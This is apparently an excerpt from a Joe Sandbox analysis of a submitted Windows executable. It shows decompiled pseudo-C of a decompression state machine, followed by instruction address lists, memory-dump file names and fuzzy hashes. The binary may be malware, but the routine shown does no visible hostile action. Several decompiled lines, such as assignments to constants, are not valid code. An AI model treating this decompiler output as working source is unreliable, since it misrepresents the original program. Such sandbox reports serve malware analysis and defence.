							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x0040667f
0x0040667f
0x00406683
0x0040673a
0x0040673d
0x00406749
0x0040662a
0x0040662a
0x0040662d
0x0040699f
0x0040699f
0x004069a2
0x004069a2
0x004069a8
0x004069ae
0x004069b4
0x004069ce
0x004069d1
0x004069d7
0x004069e2
0x004069e4
0x004069b6
0x004069b6
0x004069c5
0x004069c9
0x004069c9
0x004069ee
0x00406a15
0x00406a15
0x00406a1b
0x00406a1b
0x00000000
0x004069f0
0x004069f0
0x004069f4
0x00406ba3
0x00000000
0x00406ba3
0x00406a00
0x00406a07
0x00406a0f
0x00406a12
0x00000000
0x00406a12
0x00406689
0x0040668d
0x00406bce
0x00406bce
0x00406bd1
0x00406bd5
0x00406bd5
0x00406693
0x00406699
0x0040669c
0x004066a0
0x004066a3
0x004066a7
0x00406b6d
0x00406bb9
0x00406bc1
0x00406bc8
0x00406bca
0x00000000
0x00406bca
0x004066ad
0x004066b0
0x004066b6
0x004066b8
0x004066b8
0x004066bb
0x004066be
0x004066c1
0x004066c4
0x004066c7
0x004066ca
0x004066cb
0x004066cd
0x004066cd
0x004066cd
0x004066d0
0x004066d3
0x004066d6
0x004066d9
0x004066d9
0x004066dc
0x004066de
0x004066de
0x004066e1
0x004066e1
0x004066e1
0x004061b7
0x004061b7
0x004061c0
0x00000000
0x00000000
0x004061c6
0x00000000
0x004061d1
0x00000000
0x00000000
0x004061da
0x004061dd
0x004061e0
0x004061e4
0x00000000
0x00000000
0x004061ea
0x004061ed
0x004061ef
0x004061f0
0x004061f3
0x004061f5
0x004061f6
0x004061f8
0x004061fb
0x00406200
0x00406205
0x0040620e
0x00406221
0x00406224
0x00406230
0x00406258
0x0040625a
0x00406268
0x00406268
0x0040626c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040625c
0x0040625c
0x0040625f
0x00406260
0x00406260
0x00000000
0x0040625c
0x00406236
0x0040623b
0x0040623b
0x00406244
0x0040624c
0x0040624f
0x00000000
0x00406255
0x00406255
0x00000000
0x00406255
0x00000000
0x00406272
0x00406272
0x00406276
0x00406b22
0x00000000
0x00406b22
0x0040627f
0x0040628f
0x00406292
0x00406295
0x00406295
0x00406295
0x00406298
0x0040629c
0x00000000
0x00000000
0x0040629e
0x004062a4
0x004062ce
0x004062d4
0x004062db
0x00000000
0x004062db
0x004062aa
0x004062ad
0x004062b2
0x004062b2
0x004062bd
0x004062c5
0x004062c8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040630d
0x00406313
0x00406316
0x00406323
0x0040632b
0x00000000
0x00000000
0x004062e2
0x004062e2
0x004062e6
0x00406b31
0x00000000
0x00406b31
0x004062f2
0x004062fd
0x004062fd
0x004062fd
0x00406300
0x00406303
0x00406306
0x0040630b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406333
0x00406335
0x00406338
0x004063a9
0x004063ac
0x004063af
0x004063b6
0x004063c0
0x00000000
0x004063c0
0x0040633a
0x0040633e
0x00406341
0x00406343
0x00406346
0x00406349
0x0040634b
0x0040634e
0x00406350
0x00406355
0x00406358
0x0040635b
0x0040635f
0x00406366
0x00406369
0x00406370
0x00406374
0x0040637c
0x0040637c
0x0040637c
0x00406376
0x00406376
0x00406376
0x0040636b
0x0040636b
0x0040636b
0x00406380
0x00406383
0x004063a1
0x004063a3
0x00000000
0x00406385
0x00406385
0x00406388
0x0040638b
0x0040638e
0x00406390
0x00406390
0x00406390
0x00406393
0x00406396
0x00406398
0x00406399
0x0040639c
0x00000000
0x0040639c
0x00000000
0x004065d2
0x004065d6
0x004065f4
0x004065f7
0x004065fe
0x00406601
0x00406604
0x00406607
0x0040660a
0x0040660d
0x0040660f
0x00406616
0x00406617
0x00406619
0x0040661c
0x0040661f
0x00406622
0x00406622
0x00406627
0x00000000
0x00406627
0x004065d8
0x004065db
0x004065de
0x004065e8
0x00000000
0x00000000
0x0040663c
0x00406640
0x00406663
0x00406666
0x00406669
0x00406673
0x00406642
0x00406642
0x00406645
0x00406648
0x0040664b
0x00406658
0x0040665b
0x0040665b
0x00000000
0x00000000
0x00000000
0x00000000
0x004066f0
0x004066f4
0x004066fb
0x004066fe
0x00406701
0x0040670b
0x00000000
0x0040670b
0x004066f6
0x00000000
0x00000000
0x00406717
0x0040671b
0x00406722
0x00406725
0x00406728
0x0040671d
0x0040671d
0x0040671d
0x0040672b
0x0040672e
0x00406731
0x00406731
0x00406734
0x00406737
0x00000000
0x00000000
0x004067d7
0x004067d7
0x004067db
0x00406b79
0x00000000
0x00406b79
0x004067e1
0x004067e4
0x004067e7
0x004067eb
0x004067ee
0x004067f4
0x004067f6
0x004067f6
0x004067f6
0x004067f9
0x004067fc
0x00000000
0x00000000
0x004063cc
0x004063cc
0x004063d0
0x00406b3d
0x00000000
0x00406b3d
0x004063d6
0x004063d9
0x004063dc
0x004063e0
0x004063e3
0x004063e9
0x004063eb
0x004063eb
0x004063eb
0x004063ee
0x004063f1
0x004063f1
0x004063f4
0x004063f7
0x00000000
0x00000000
0x004063fd
0x00406403
0x00000000
0x00000000
0x00406409
0x00406409
0x0040640d
0x00406410
0x00406413
0x00406416
0x00406419
0x0040641a
0x0040641d
0x0040641f
0x00406425
0x00406428
0x0040642b
0x0040642e
0x00406431
0x00406434
0x00406437
0x00406453
0x00406456
0x00406459
0x0040645c
0x00406463
0x00406467
0x00406469
0x0040646d
0x00406439
0x00406439
0x0040643d
0x00406445
0x0040644a
0x0040644c
0x0040644e
0x0040644e
0x00406470
0x00406477
0x0040647a
0x00000000
0x00406480
0x00000000
0x00406480
0x00000000
0x00406485
0x00406485
0x00406489
0x00406b49
0x00000000
0x00406b49
0x0040648f
0x00406492
0x00406495
0x00406499
0x0040649c
0x004064a2
0x004064a4
0x004064a4
0x004064a4
0x004064a7
0x004064aa
0x004064aa
0x004064aa
0x004064b0
0x00000000
0x00000000
0x004064b2
0x004064b5
0x004064b8
0x004064bb
0x004064be
0x004064c1
0x004064c4
0x004064c7
0x004064ca
0x004064cd
0x004064d0
0x004064e8
0x004064eb
0x004064ee
0x004064f1
0x004064f1
0x004064f4
0x004064f8
0x004064fa
0x004064d2
0x004064d2
0x004064da
0x004064df
0x004064e1
0x004064e3
0x004064e3
0x004064fd
0x00406504
0x00406507
0x00000000
0x00406509
0x00000000
0x00406509
0x00406507
0x0040650e
0x0040650e
0x0040650e
0x0040650e
0x00000000
0x00000000
0x00406549
0x00406549
0x0040654d
0x00406b55
0x00000000
0x00406b55
0x00406553
0x00406556
0x00406559
0x0040655d
0x00406560
0x00406566
0x00406568
0x00406568
0x00406568
0x0040656b
0x0040656e
0x0040656e
0x00406574
0x00406512
0x00406512
0x00406515
0x00000000
0x00406515
0x00406576
0x00406576
0x00406579
0x0040657c
0x0040657f
0x00406582
0x00406585
0x00406588
0x0040658b
0x0040658e
0x00406591
0x00406594
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b5
0x004065b8
0x004065bc
0x004065be
0x00406596
0x00406596
0x0040659e
0x004065a3
0x004065a5
0x004065a7
0x004065a7
0x004065c1
0x004065c8
0x004065cb
0x00000000
0x004065cd
0x00000000
0x004065cd
0x00000000
0x0040685a
0x0040685a
0x0040685e
0x00406b85
0x00000000
0x00406b85
0x00406864
0x00406867
0x0040686a
0x0040686e
0x00406871
0x00406877
0x00406879
0x00406879
0x00406879
0x0040687c
0x00000000
0x00000000
0x00000000
0x00000000
0x00406969
0x0040696d
0x0040698f
0x00406992
0x0040699c
0x00000000
0x0040699c
0x0040696f
0x00406972
0x00406976
0x00406979
0x00406979
0x0040697c
0x00000000
0x00000000
0x00406a26
0x00406a2a
0x00406a48
0x00406a48
0x00406a48
0x00406a4f
0x00406a56
0x00406a5d
0x00406a5d
0x00000000
0x00406a5d
0x00406a2c
0x00406a2f
0x00406a32
0x00406a35
0x00406a3c
0x00406980
0x00406980
0x00406983
0x00000000
0x00000000
0x00406b17
0x00406b1a
0x00000000
0x00000000
0x00406751
0x00406753
0x0040675a
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00000000
0x00406768
0x0040676b
0x0040676e
0x00406770
0x00406772
0x00406772
0x00406773
0x00406776
0x0040677d
0x00406780
0x0040678e
0x00000000
0x00000000
0x00406a64
0x00406a64
0x00406a67
0x00406a6e
0x00000000
0x00000000
0x00406a73
0x00406a73
0x00406a77
0x00406baf
0x00000000
0x00406baf
0x00406a7d
0x00406a80
0x00406a83
0x00406a87
0x00406a8a
0x00406a90
0x00406a92
0x00406a92
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a98
0x00406a98
0x00406a9b
0x00406a9b
0x00406a9f
0x00406aff
0x00406b02
0x00406b07
0x00406b08
0x00406b0a
0x00406b0c
0x00406b0f
0x00000000
0x00406b0f
0x00406aa1
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abf
0x00406ac2
0x00406adb
0x00406ade
0x00406ae1
0x00406ae4
0x00406ae8
0x00406aea
0x00406aea
0x00406aeb
0x00406aee
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad6
0x00406ad6
0x00406af1
0x00406af8
0x00000000
0x00406afa
0x00000000
0x00406afa
0x00000000
0x00406796
0x00406799
0x004067cf
0x004068ff
0x004068ff
0x004068ff
0x004068ff
0x00406902
0x00406902
0x00406905
0x00406907
0x00406b91
0x00000000
0x00406b91
0x0040690d
0x00406910
0x00000000
0x00000000
0x00406916
0x0040691a
0x0040691d
0x0040691d
0x0040691d
0x00000000
0x0040691d
0x0040679b
0x0040679d
0x0040679f
0x004067a1
0x004067a4
0x004067a5
0x004067a7
0x004067a9
0x004067ac
0x004067af
0x004067c5
0x004067ca
0x00406802
0x00406802
0x00406806
0x00406832
0x00406834
0x0040683b
0x0040683e
0x00406841
0x00406841
0x00406846
0x00406846
0x00406848
0x0040684b
0x00406852
0x00406855
0x00406882
0x00406882
0x00406885
0x00406888
0x004068fc
0x004068fc
0x004068fc
0x00000000
0x004068fc
0x0040688a
0x00406890
0x00406893
0x00406896
0x00406899
0x0040689c
0x0040689f
0x004068a2
0x004068a5
0x004068a8
0x004068ab
0x004068c4
0x004068c6
0x004068c9
0x004068ca
0x004068cd
0x004068cf
0x004068d2
0x004068d4
0x004068d6
0x004068d9
0x004068db
0x004068de
0x004068e2
0x004068e4
0x004068e4
0x004068e5
0x004068e8
0x004068eb
0x004068ad
0x004068ad
0x004068b5
0x004068ba
0x004068bc
0x004068bf
0x004068bf
0x004068ee
0x004068f5
0x0040687f
0x0040687f
0x0040687f
0x0040687f
0x00000000
0x004068f7
0x00000000
0x004068f7
0x004068f5
0x00406808
0x0040680b
0x0040680d
0x00406810
0x00406813
0x00406816
0x00406818
0x0040681b
0x0040681e
0x0040681e
0x00406821
0x00406821
0x00406824
0x0040682b
0x004067ff
0x004067ff
0x004067ff
0x004067ff
0x00000000
0x0040682d
0x00000000
0x0040682d
0x0040682b
0x004067b1
0x004067b4
0x004067b6
0x004067b9
0x00000000
0x00000000
0x00406518
0x00406518
0x0040651c
0x00406b61
0x00000000
0x00406b61
0x00406522
0x00406525
0x00406528
0x0040652b
0x0040652e
0x00406531
0x00406534
0x00406536
0x00406539
0x0040653c
0x0040653f
0x00406541
0x00406541
0x00406541
0x00000000
0x00000000
0x00000000
0x00000000
0x00406920
0x00406920
0x00406920
0x00406924
0x00000000
0x00000000
0x0040692a
0x0040692d
0x00406930
0x00406933
0x00406935
0x00406935
0x00406935
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x00406948
0x0040694a
0x0040694a
0x0040694a
0x0040694d
0x00406950
0x00406953
0x00406956
0x00406959
0x0040695d
0x0040695f
0x00406962
0x00000000
0x00406964
0x00000000
0x00406964
0x00406962
0x00406b97
0x00000000
0x00000000
0x004061c6

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 112a48c21f92b6a8e33e5cbf0d578aa67701f3a308a0143f1b2e2e22e9c0a048
Instruction ID: 56628f401a4fc6d73e137493fcd66a1037cbd66c5efac646bb7951d26cabb475
Opcode Fuzzy Hash: 112a48c21f92b6a8e33e5cbf0d578aa67701f3a308a0143f1b2e2e22e9c0a048
Instruction Fuzzy Hash: CF815871D00228CFDF24CFA8C8447ADBBB1FB45305F25816AD856BB281D7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 004065D2 Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

